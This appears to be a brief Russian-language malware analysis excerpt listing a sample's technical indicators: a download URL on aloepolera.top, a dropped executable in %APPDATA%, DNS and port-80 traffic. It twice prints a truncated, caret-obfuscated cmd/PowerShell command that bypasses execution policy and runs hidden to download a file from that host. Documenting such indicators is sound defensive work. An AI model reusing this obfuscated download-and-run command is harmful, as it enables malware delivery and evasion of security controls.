Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OW^e^rSHeLL.Exe -E^x^ECu^T^IOn^POL^IC^y b^YPaSs^ -^noPr^oFIlE ^-wiNDOwSTy^LE HI^DDeN (nEw-O^bJ^EC^T s^y^s^t^Em.nEt.WeB^cL^i^Ent).dOwn^lo^ADFilE('http://aloepolera.top/read...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "P^OW^e^rSHeLL.Exe -E^x^ECu^T^IOn^POL^IC^y b^YPaSs^ -^noPr^oFIlE ^-wiNDOwSTy^LE HI^DDeN (nEw-O^bJ^EC^T s^y^s^t^Em.nEt.WeB^cL^i^Ent).dOwn^lo^ADFilE('http://aloepolera.top/read...' (со скрытым окном)